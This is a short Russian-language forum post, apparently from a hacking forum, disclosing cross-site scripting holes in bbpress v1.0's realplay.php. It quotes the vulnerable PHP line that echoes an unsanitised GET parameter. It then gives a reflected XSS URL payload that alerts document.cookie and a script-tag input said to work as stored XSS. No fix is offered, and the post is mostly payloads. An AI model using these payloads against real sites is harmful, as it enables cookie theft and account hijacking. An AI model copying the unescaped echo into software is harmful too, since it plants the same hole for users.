20.12.2008, 16:26
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
bbpress
bbpress v1.0
File: realplay.php
Уязвимый кусок кода:
Код:
<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>
XSS иньекция:
Код:
http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E
Активная XSS:
В /inc/realplay.php поле email вводим:
Код:
<script>alert()</script>
Последний раз редактировалось baltazar; 20.12.2008 в 16:28..
|
|
|